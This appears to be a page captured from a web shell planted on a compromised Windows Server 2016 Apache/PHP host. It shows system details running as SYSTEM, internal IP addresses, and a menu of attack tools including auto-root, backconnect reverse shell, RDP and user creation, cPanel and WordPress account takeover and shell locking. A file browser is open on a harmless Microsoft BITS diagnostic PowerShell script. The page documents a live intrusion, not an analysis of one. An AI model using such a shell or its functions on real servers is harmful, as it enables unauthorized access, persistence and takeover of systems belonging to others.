Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
Windows /
diagnostics /
system /
BITS /
[ HOME SHELL ]
Name
Size
Permission
Action
en-US
[ DIR ]
drwxrwxrwx
CL_Registry.ps1
19.58
KB
-rw-rw-rw-
DiagPackage.diagpkg
6.98
KB
-rw-rw-rw-
DiagPackage.dll
77
KB
-rw-rw-rw-
RC_BITSACL.ps1
1.03
KB
-rw-rw-rw-
RC_BITSDLL.ps1
2.17
KB
-rw-rw-rw-
RC_BITSRegKeys.ps1
5.2
KB
-rw-rw-rw-
RS_BITSACL.ps1
858
B
-rw-rw-rw-
RS_BITSDLL.ps1
779
B
-rw-rw-rw-
RS_BITSRegKeys.ps1
5.19
KB
-rw-rw-rw-
TS_Main.ps1
1.81
KB
-rw-rw-rw-
cl_Service.ps1
10.18
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RC_BITSDLL.ps1
# Copyright © 2015, Microsoft Corporation. All rights reserved. # :: ======================================================= :: #==================================================================================== # Initialize #==================================================================================== Import-LocalizedData -BindingVariable Strings_RC_BITSDLL -FileName CL_LocalizationData $BitsDLLdetected = $false #==================================================================================== # Load Utilities #==================================================================================== . ./Cl_Service.ps1 #==================================================================================== # Main #==================================================================================== try { $INT_GetPackageIDResult = Get-DiagInput -ID 'INT_EnableSFC' -EA SilentlyContinue } catch { # When pack runs alone, the answer file wont be present resulting in script error, that's why try catch block is introduced } if ($INT_GetPackageIDResult -eq 'false') { return $false } $cpu = gwmi -Query 'Select * from Win32_Processor' if ( 5 -eq $cpu.Architecture ) { # Not detecting the root cause in case of ARM processor. return $false } SServicer 'bits' 'Stopped' # Running SFC for Qmgr.dll $output = sfc /scanfile="$env:windir\system32\Qmgr.dll" # Processing the output for report $sb = New-Object System.Text.StringBuilder foreach($s in $output) { if($s){$n = $sb.append($s)} } $output = $sb.Tostring().ToCharArray() $sb = New-Object System.Text.StringBuilder foreach($s in $output) { if($s){$n = $sb.append($s)} } $output = $sb.Tostring() $Global:sfcOputFile = "$env:temp\sfcOput.txt" if (Test-Path $Global:sfcOputFile) { del $Global:sfcOputFile -Force } if(![string]::IsNullOrEmpty($output)) { $output > $sfcOputFile if($output.Trim().ToLower().IndexOf('cbs.log') -gt -1) { $BitsDLLdetected = $true } } SServicer 'bits' 'Running' Update-DiagRootCause -ID 'RC_BITSDLL' -Detected $BitsDLLdetected If(!$BitsDLLdetected) { del $Global:sfcOputFile -Force } return $BitsDLLdetected
Close